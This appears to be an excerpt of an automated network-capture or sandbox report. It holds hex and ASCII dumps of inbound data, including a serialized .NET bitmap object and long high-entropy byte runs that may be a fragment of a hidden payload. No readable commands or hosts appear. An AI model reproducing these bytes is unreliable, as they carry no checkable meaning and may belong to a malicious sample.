2021-10-16 14:53:37 UTC	1237	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	1253	IN	Data Raw: b6 7d a9 91 fe 99 a3 9a 58 da d8 ff cc 23 33 38 e5 8b 33 37 d7 4b 7c d5 8b bd 8f d1 33 01 cd 07 83 3b c1 9c 5f 7d 53 a8 5b 83 dd 92 4b ae bc 11 0a 42 8f f8 a7 5c 6c 67 c7 b7 6d 38 2c 29 bd eb 04 49 a6 50 12 41 6f 8d c2 52 62 c6 69 31 71 ba 59 eb 43 29 71 57 b1 af 0c 95 aa 90 43 00 83 a2 5b fc 91 70 5d 33 ae 21 60 e5 49 90 4f a1 cc 5f 30 00 dc 7b f1 d1 4d e4 b2 da 62 c7 19 8f b6 54 7c cd b0 ed 57 d2 5c 18 f6 3c 8a fe 3b 1a 56 e6 96 2f f5 66 61 32 46 26 e3 5e 74 5f 5e 79 2c f4 8c 84 2d 4d 26 9c 33 c3 b0 59 ee 35 ca 2c bf 3d a5 01 a4 d8 c0 23 e4 66 2b 8c 68 11 1a 78 50 9f c4 02 41 ce 01 c6 1e 9b fd 9f ae 28 be 61 41 d9 e3 02 1b fe 0b 2c a2 a7 03 2d 02 5f be 93 d3 17 2d 25 d3 0b 7d d0 6b 9a da 4d 84 96 45 38 b6 a5 e7 33 88 d3 63 a2 44 62 3e 3f 8e fa b6 36 1c Data Ascii: }X#3837K\|3;_}S[KB\lgm8,)IPAoRbi1qYC)qWC[p]3!`IO_0{MbT\|W\<;V/fa2F&^t_^y,-M&3Y5,=#f+hxPA(aA,-_-%}kME83cDb>?6
2021-10-16 14:53:37 UTC	1269	IN	Data Raw: d8 7f ee 4e ed 14 7f f9 80 a2 21 60 cc c5 6a 54 0a 6b 06 87 28 ff 01 7a ab ff 1b 45 e4 de 99 8b 8c 09 53 2a ee c0 10 19 e7 c8 ae c6 61 73 32 d0 fe f0 ee 0f 15 80 d8 88 b4 02 ce a2 d9 0b ff 6a 49 c5 79 cb e6 59 73 15 da 63 b3 aa 0e 9f f1 9c a1 a4 71 76 ca ce bf fa 8c c4 de 8e 1e 22 d9 16 c6 69 ef dc c5 6e 8f e2 92 2a 64 b8 f0 3d ff 01 68 03 0f a5 cb 9a 0a 59 c7 09 e6 d8 cc 63 b9 9e 7d 12 a1 e4 c4 a2 61 c9 aa 58 a0 5e a4 b2 e0 82 d7 fa 14 d6 bc 6b c9 15 f1 be c0 f7 12 7e d8 f9 3e 17 b7 84 d9 ee 89 1e b0 26 46 eb 47 2f 11 1c 9b 9c dc 02 d1 43 8c 4b f1 c5 11 48 4c 89 91 ed 43 51 78 8b 40 dc 2e 64 ad ee 20 be 03 3f 0a f2 f4 a3 3c 28 14 ee 71 42 5d 1c 91 06 32 b6 20 aa c5 9a 81 86 64 33 82 d8 fe 92 de 74 88 c9 b5 19 86 49 61 47 73 ea 29 e5 86 23 af 97 40 0c 87 Data Ascii: N!`jTk(zESas2jIyYscqv"ind=hYc}aX^k~>&FG/CKHLCQx@.d ?<(qB]2 d3tIaGs)#@
2021-10-16 14:53:37 UTC	1285	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	1301	IN	Data Raw: 2b c3 23 56 f2 6a 97 52 0b d0 de c0 02 1c b2 48 cd 15 a9 b9 9a 01 9d 29 b0 b6 39 94 90 44 83 0e 5a e9 83 d1 22 b8 bc 48 6f 10 71 2b a7 c5 70 7d 58 26 f6 d8 c0 ff 04 bd 17 fb 89 92 df 5a d2 80 ed bc 2f 4a b9 33 9f ba 10 d0 7b b4 a0 de 45 89 14 21 ed 93 fe 79 27 7b 0b 40 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 51 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 30 33 66 35 66 37 66 31 31 64 35 30 61 33 61 05 01 00 00 00 15 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2e 42 69 74 6d 61 70 01 00 00 00 04 44 61 74 61 07 02 02 00 00 00 09 03 00 00 00 0f 03 00 00 00 e6 16 00 00 02 42 4d e6 16 Data Ascii: +#VjRH)9DZ"Hoq+p}X&Z/J3{E!y'{@QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aSystem.Drawing.BitmapDataBM
2021-10-16 14:53:37 UTC	1317	IN	Data Raw: 0d 37 64 6a 6d 8c af 85 98 75 13 00 02 68 71 08 78 31 47 98 40 87 26 80 8d 9c 3f 86 7e 90 64 4a d8 01 a8 9e 2f 1d ed 0f cd 1d c8 e9 69 66 0b 9d 87 54 f8 4c b2 89 70 8b 22 48 d6 83 76 37 17 c1 68 c0 57 13 f3 97 dc d2 1f 43 74 4e 6a 0c 9f f1 85 d4 f7 77 df 63 7e 35 ac 01 ac 29 91 81 d8 3e 29 d3 c9 13 9c 70 36 4b fa f0 6d f1 cb 61 99 8e f7 e6 f1 b4 0d c2 1a ef 33 df 1a 93 95 e0 56 2f b1 6f 50 97 66 15 c2 85 07 10 9a b1 71 92 e6 21 4a 1e 00 42 d5 e9 fa e8 e9 b7 30 e8 a7 b8 de 0e a6 e7 94 b6 88 19 76 f2 ff 89 40 23 00 78 6c 6b a6 85 20 96 83 b5 75 62 3d 4c 1d 95 a0 5f 47 5c 42 79 db b8 5a 00 90 48 f4 a4 45 0c 7a eb 07 64 13 a9 01 81 11 6c b1 af 37 d8 70 e5 cf 04 50 68 9d d1 39 fa 04 51 cf fc a1 84 07 b4 91 d3 e9 ba 50 dd aa 04 72 1f 10 10 f3 a2 9e 24 12 39 dd Data Ascii: 7djmuhqx1G@&?~dJ/ifTLp"Hv7hWCtNjwc~5)>)p6Kma3V/oPfq!JB0v@#xlk ub=L_G\ByZHEzdl7pPh9QPr$9
2021-10-16 14:53:37 UTC	1333	IN	Data Raw: 74 1b d3 69 7c 50 53 57 01 01 79 57 51 73 22 e5 aa 14 54 d2 e8 be 19 d1 fe 81 fa 9b 2f be d2 e3 1e 6d 8c 94 51 2e 2f da 10 9b 7f d8 8c 48 2d b8 a4 72 33 65 28 09 92 35 fa fd a1 f3 1c 9d 61 e2 6a c1 b4 23 a2 5c 9c 32 7d 5b 4d fa 13 35 bc 25 05 40 6e e2 d3 7f 52 03 20 3c df 0d 99 6c bb da e8 62 96 0f 5c c4 95 7d c9 86 5f d8 43 28 a7 c9 ed 1b 97 f3 05 d4 63 09 d8 f9 d0 3b 95 c4 1b d2 af 7e e1 72 62 7e e1 1e 51 cc 12 4d 55 17 41 6a c8 c7 95 d7 91 c6 e1 7b 13 4c a8 27 72 f9 fb 9e bf 8c 92 58 66 9f 99 b8 89 d6 eb 2b 3f 5f 97 30 1f 30 9c 75 b7 f1 a2 4b e5 6a ec 6d 24 16 77 d9 97 5f 2e 53 c8 94 f4 00 2c 33 4c 5c 25 fc cd e1 d7 a2 08 18 31 29 49 f3 89 57 25 2c 60 e6 b8 14 0a db 92 d7 ac 65 b5 31 12 e4 71 bb 34 b3 1b f0 be 5b 31 78 3d d3 1e 77 7c 0a 0a 9d 17 b3 9f Data Ascii: ti\|PSWyWQs"T/mQ./H-r3e(5aj#\2}[M5%@nR <lb\}_C(c;~rb~QMUAj{L'rXf+?_00uKjm$w_.S,3L\%1)IW%,`e1q4[1x=w\|
2021-10-16 14:53:37 UTC	1349	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	1365	IN	Data Raw: 9e a5 d5 b3 0d 5a 9b fc f4 25 ab 25 12 94 a1 08 3d ea b4 b3 3b ee 30 b4 e0 5b c4 52 c6 29 47 40 45 54 19 39 19 02 57 7d f6 fd 91 26 23 df 83 27 73 31 f8 44 0d 40 a7 50 33 0e 9a 89 1e ba 01 3a 35 e2 d4 b1 dc 24 38 f1 65 35 de fc 81 da 4f ec e6 63 44 7e f4 ed d7 05 67 cc 6b b4 30 8e b4 95 40 68 de 75 c6 f4 31 59 86 4f 68 85 96 a0 52 ef 41 89 6f 1a 91 75 53 72 d0 9d b3 fc da 0c 55 17 c9 60 ac 34 d0 4c 35 5b f8 a2 02 16 a0 a1 5e ac b6 c1 04 5b 6d 81 b3 b1 a1 60 05 cf 57 82 d3 9a 9a 69 29 b7 b8 a7 ea ef b2 db 3e 79 cc 2d 50 c1 41 3f b3 c8 dd a1 4f 8a 25 47 20 c9 16 a7 bc 42 92 56 14 c8 e1 f5 00 f5 90 a1 a4 9c ac 82 8b ab 90 c5 ea 0a 1c 54 5c f3 54 5e 63 98 f3 68 51 27 88 33 8f 89 f3 b4 a5 18 39 04 16 98 94 9f 1f bf 77 bc 3d ad b6 b8 dc 2e c1 2c 56 f6 c5 d6 ed Data Ascii: Z%%=;0[R)G@ET9W}&#'s1D@P3:5$8e5OcD~gk0@hu1YOhRAouSrU`4L5[^[m`Wi)>y-PA?O%G BVT\T^chQ'39w=.,V
2021-10-16 14:53:37 UTC	1381	IN	Data Raw: 10 15 68 61 b2 71 b1 1b 1e ba e8 2a bf 16 f2 bf ad 13 57 66 f6 76 5c af 0f 6e cf 4a 92 c0 9e c0 e9 65 bb d9 5f c6 f5 17 33 48 bf b9 d6 e9 0f ed 12 45 cc 95 85 00 f4 7c 17 76 ac e6 fd 4f 91 e8 53 87 36 ee 3f 59 d5 aa b7 4b 24 33 64 78 c8 b7 3a 47 56 d1 8b d4 2b b1 39 6e 5c 05 7f ab 81 a5 7d 22 61 b7 92 a7 2d b5 67 2b a6 fe 92 9c 7a 96 86 5c 8b 78 7c b1 d4 33 b8 79 24 63 5d b1 1e 1b 75 43 23 06 3e 24 4e fc 67 9e a9 44 ad 47 58 54 f8 a2 78 f7 aa 6c 42 46 04 04 5f 0d e4 e7 b5 32 26 bd fa 93 f0 e2 8e 72 b4 f6 a6 73 63 85 27 2d 14 d5 9d e1 54 43 99 ee e5 dc 5f 6b a7 b1 f0 eb 21 82 ed 6f 7c 99 4c 6b bb 81 31 4e 48 d5 19 0f a4 ee c3 f8 ea 9d 0f e2 fe 0f db d3 ef 3f 6b 0f e1 6b 79 bb 2e ea 38 30 1d 2c 66 5a 9a 76 a5 98 53 76 86 76 f9 f5 2e 6f 67 0e 88 74 c9 bc ad Data Ascii: haq*Wfv\nJe_3HE\|vOS6?YK$3dx:GV+9n\}"a-g+z\x\|3y$c]uC#>$NgDGXTxlBF_2&rsc'-TC_k!o\|Lk1NH?kky.80,fZvSvv.ogt
2021-10-16 14:53:37 UTC	1397	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe f5 a7 2f eb ea Data Ascii: /
2021-10-16 14:53:37 UTC	1413	IN	Data Raw: 67 2e 42 69 74 6d 61 70 01 00 00 00 04 44 61 74 61 07 02 02 00 00 00 09 03 00 00 00 0f 03 00 00 00 e6 16 00 00 02 42 4d e6 16 00 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 00 00 00 2c 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 c4 0e 00 00 c4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: g.BitmapDataBM6(,,
2021-10-16 14:53:37 UTC	1429	IN	Data Raw: 77 b2 47 c4 16 80 81 8c f2 77 8b ec 25 ae e2 a9 cc b8 a4 ca 6f d4 70 4e 2a 0d ea cb 8f b7 6d a9 4e d1 6f fc 42 89 15 79 1a b0 e0 08 06 5d b5 a1 8a 1a 64 6d e6 7a af fe c7 c2 b4 2e 30 95 98 d3 c3 3a 57 3f 40 69 da eb d4 1d c6 f7 ae d1 31 b8 d2 32 40 73 ab 33 bc 35 02 63 33 84 90 ef 59 76 5e ad 71 60 25 94 09 32 01 22 b8 17 29 dc 17 81 d6 ff e7 3c 38 71 6c 3e b6 35 c1 16 7d 6b 17 cc 47 ca 01 b9 b8 9d 04 41 71 04 9e fd bc 42 a6 9e 22 d4 8f 68 ca 15 12 b2 72 6f 3e 21 3f 4b d1 48 f7 4e 83 6f e2 05 08 5a f1 fd 51 17 b5 09 74 cc ba 82 e1 65 2d 39 ba 6d 06 61 5c 17 2f 1a bd 7a 73 45 32 6d a6 cc 5a 85 95 a2 fb 79 f3 ac cc c2 b1 29 b2 42 e0 00 b6 94 f7 6e 46 14 0d 00 d4 22 96 b7 c2 23 01 1d d3 e0 ca e6 07 f1 b6 ac f1 91 10 48 aa c9 21 f2 99 cb 39 29 fb 62 f6 ae 00 Data Ascii: wGw%opN*mNoBy]dmz.0:W?@i12@s35c3Yv^q`%2")<8ql>5}kGAqB"hro>!?KHNoZQte-9ma\/zsE2mZy)BnF"#H!9)b
2021-10-16 14:53:37 UTC	1445	IN	Data Raw: 16 a2 bf ea 66 1b a4 69 a7 49 62 96 6d 82 08 17 64 aa fe 7a 5f 50 36 b1 9b 1e 01 30 d2 cb 79 46 4d da 5a 27 7d 0f c3 6b fc e9 4d 99 43 12 e0 53 1b e9 97 1b 5a 75 40 42 aa b8 78 f5 68 fe 7e 68 97 7e e8 f2 e3 12 71 45 f8 32 21 7a bc 1f 00 96 af 96 0e 01 6a f1 06 95 72 3c da bd a7 8c ea 44 dd c8 62 cf d7 5c 7d b5 c7 e6 85 33 1f e3 05 28 35 52 0d 36 f6 5a 48 69 1f 0a 35 40 d4 b4 37 20 f2 c3 67 16 57 72 75 63 83 35 53 0f 20 77 44 a4 56 19 12 f8 28 93 d9 59 27 6d 13 de bf 08 b7 14 66 b6 64 fd 36 82 bc 29 4d 91 42 ea 25 9f 64 cf 01 65 60 72 c3 3a 75 be 19 85 8c 39 88 72 f0 6e eb b0 e3 0f f9 f4 25 24 8d 8b 18 bc 1e 6a 4f d5 4d fe f2 ee 55 1f a5 12 de c0 72 9e a9 f3 96 42 b6 c0 21 4e ec 79 18 ac 4f b2 f8 b3 ff d2 4c 85 7e 58 15 5c ce 35 86 b2 e0 38 f9 1f 7e 96 31 Data Ascii: fiIbmdz_P60yFMZ'}kMCSZu@Bxh~h~qE2!zjr<Db\}3(5R6ZHi5@7 gWruc5S wDV(Y'mfd6)MB%de`r:u9rn%$jOMUrB!NyOL~X\58~1
2021-10-16 14:53:37 UTC	1461	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	1477	IN	Data Raw: 78 a2 27 05 a1 18 ee dc 98 c8 3a de e3 ab b3 ac 2f 15 75 1f 10 b5 27 90 44 ab 64 7c b4 e1 99 8a e6 3b 29 d2 b1 61 07 a7 99 d2 e4 80 22 d4 51 9e 6e cc 55 50 97 12 6d 68 8a 94 ad 53 b5 ef 86 73 02 36 53 54 bd 26 ef f5 f6 72 2b 9e 57 46 9d f6 be 85 36 2f 69 a3 1f c8 48 f2 02 9c 4b 35 db 79 ab a6 03 6e f3 d7 45 1e 09 7a 49 0a 4e 3d 2a e4 c2 9a 3e 25 6b b7 14 91 cd ba 1f 19 2e 20 aa 51 a6 f5 a1 0d 09 24 dc 09 8f bc e1 3c 86 d4 50 58 79 be 5d cf 30 f2 55 46 b5 61 12 97 c8 d1 d4 8b 7a 8d ec 20 db 86 7e e1 0a 7d ce 72 79 0c 73 1b 78 02 da 8d a7 6d fd a9 b6 d5 9f 63 c1 c5 b6 1e e0 37 9d 00 80 f4 59 4c 88 a2 a5 e1 6e ce e6 43 21 70 16 be 06 84 e6 e5 73 10 ad ce f6 83 a3 f7 51 5a 84 93 da 44 7a 4b 10 6d 1a c2 71 cc 08 69 49 73 2c c8 2b 82 63 e5 4b 84 ba 42 07 7d c4 Data Ascii: x':/u'Dd\|;)a"QnUPmhSs6ST&r+WF6/iHK5ynEzIN=*>%k. Q$<PXy]0UFaz ~}rysxmc7YLnC!psQZDzKmqiIs,+cKB}
2021-10-16 14:53:37 UTC	1493	IN	Data Raw: ba 59 71 51 3b 49 4d 7a 41 36 68 ef 6e bc f4 f7 6a db 6c 4b 57 ca 16 2b ad 3f d2 de b1 90 f5 f0 8a 76 a9 37 2b 9a 57 bc b3 a3 32 c7 e3 b1 4e 31 7e 8c 64 2f 94 50 e3 c2 c2 7e 8f 80 3d 6b a1 a8 74 65 bd 04 ee e1 3c c4 3f 76 93 ab 78 db 63 ef 8c ce f5 6b d2 ad a0 6b 69 8f 27 0b f1 43 9e 83 55 5e 9f 77 92 06 69 ea c5 e8 11 f5 3d 86 cd 2e a7 6e 27 07 20 2e 5e df 24 77 09 90 52 48 54 41 13 7a 0b 74 4a 10 6e 5d 61 74 79 6a a4 25 10 39 c4 3b 71 38 aa 2f 0f fa 14 c1 5c 58 16 22 34 31 f1 8b a0 ea 74 77 5c e3 c9 8b 38 f2 65 9a 69 00 f8 2c 44 03 a4 6a 9c 86 3d a6 28 d1 2a f6 c3 e8 81 7a 68 32 7b 3f a9 de bb b6 d9 2e 6c 3e fa 73 63 af df 75 f9 d9 54 96 9b 42 41 57 d0 c2 c7 5b 74 58 dc 5c 3d c1 77 05 f3 db 9c 36 8c 6d 03 6c bd 8d 35 27 b5 12 6d 7e a4 fb 94 81 dd 6a 06 Data Ascii: YqQ;IMzA6hnjlKW+?v7+W2N1~d/P~=kte<?vxckki'CU^wi=.n' .^$wRHTAztJn]atyj%9;q8/\X"41tw\8ei,Dj=(*zh2{?.l>scuTBAW[tX\=w6ml5'm~j
2021-10-16 14:53:37 UTC	1509	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0b ac e2 60 52 fb f2 e9 2d 26 4a 98 42 b2 68 1c 6e 5c d2 9d e3 5f ce d3 1c db 88 58 48 07 03 9f e0 a8 2c ec 4d 07 83 7c ff f5 84 fa 95 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa 1d 2e 92 a0 6b 95 b4 15 59 73 0c ef ff d7 26 e3 a7 d4 c7 91 a3 22 5c 51 f4 8c 57 ab 48 b1 1e 42 3b 4e 8a 4c bb ab 45 9e a7 e3 ae 12 7e 71 33 ae 0b 96 4c 4c 8b e9 b5 e0 69 42 47 92 9c e3 67 ae b7 c8 0e 54 d3 d0 20 28 41 d2 6d d5 0f 39 47 c7 c1 2a 6c 8d 00 08 Data Ascii: 4`R-&JBhn\_XH,M\|.kYs&"\QWHB;NLE~q3LLiBGgT (Am9G*l
2021-10-16 14:53:37 UTC	1525	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	1541	IN	Data Raw: dd 30 67 eb b5 e6 56 1d 9c c5 5e 16 86 24 25 34 50 3f 9b 9d 21 05 68 08 06 53 5d 46 bf 0f 3e f0 f3 4f c6 7d fd 5d 2b 8f 3d c1 e2 7b 6b 62 e0 3c fa b0 ae 75 47 ba e3 2d 94 b5 ed 6c f4 dd e9 5e 46 a8 02 ab 89 30 de 11 78 a8 1f 4d b7 bc 0d 46 f0 20 47 76 9b 1b 35 17 cd b1 65 ba e0 2a cd cd 23 20 ea ad b9 e8 52 02 f5 c7 f7 c2 a7 10 b0 b3 fa 6e 25 db ba 44 13 97 8f 61 84 01 f6 76 4a 55 38 24 0b 27 3f b2 27 50 4e b8 2c 1c 45 f5 ff 73 37 e7 64 6c a1 f1 65 bf 07 37 f9 ab a1 c1 b8 2d 11 f6 da ec 67 9a 91 08 3b e9 04 01 ad f0 78 9e a9 60 94 56 ac 4e d1 cb 2a b6 3f e5 d1 87 d1 54 e4 4f bb c8 91 39 6c 92 ec 56 cf 7a 80 cc 4a f7 99 be 91 b9 2e be 6d 5f ce 53 31 bd ac 9a 18 05 c7 6e 60 ce e3 ea a8 56 55 98 09 5c 51 8a 2b d6 81 d6 91 59 ce 7d be 55 fb 52 38 e0 e4 b2 e7 Data Ascii: 0gV^$%4P?!hS]F>O}]+={kb<uG-l^F0xMF Gv5e# Rn%DavJU8$'?'PN,Es7dle7-g;x`VN?TO9lVzJ.m_S1n`VU\Q+Y}UR8
2021-10-16 14:53:37 UTC	1557	IN	Data Raw: af 72 68 c1 da 5b df d7 a3 f0 5c b3 59 af 8f 8f 82 56 08 09 ee fb 2e 05 6c f3 f8 d2 fe 01 5a bc 1e 91 54 69 1d ee bd 18 22 50 d2 d9 15 f5 a9 c9 14 1b fa d6 e5 62 6b e6 ff f4 e0 fd e1 2c b4 c8 a8 8e 64 d3 b3 6b d0 99 91 0a 45 fe d2 65 84 ff 64 86 0f 77 6f b8 02 c7 e3 ac 06 8e bf c8 e1 c3 ea 27 dc af d3 0c 37 c5 83 fb 6a 5b 74 51 4b 9f 10 48 6e 69 bf 3b a6 b2 e3 ac 97 1a da cf e1 b6 85 d1 0d 3b 87 9a a0 3d 16 c5 e3 26 3f fb 7d a1 0e 92 51 94 bc ce 9f 7d fe 19 48 13 5b c8 89 fa 11 d7 01 4f 65 ca a9 61 21 16 c6 76 91 4c 72 79 97 a4 c4 14 b3 a2 6b 11 fe bc 10 db 9b ca 79 4e eb eb d7 21 18 39 3d ff 75 36 90 54 cf cb 40 13 be f8 31 ca fd 22 df cf 63 56 8c 9a 59 43 ab a2 18 0a 7d 05 91 b8 4e b0 54 39 3a 10 87 d3 b5 cc db 47 7f c5 05 b0 12 b0 9d 6a 2b f0 c9 fe 34 Data Ascii: rh[\YV.lZTi"Pbk,dkEedwo'7j[tQKHni;;=&?}Q}H[Oea!vLrykyN!9=u6T@1"cVYC}NT9:Gj+4
2021-10-16 14:53:37 UTC	1573	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
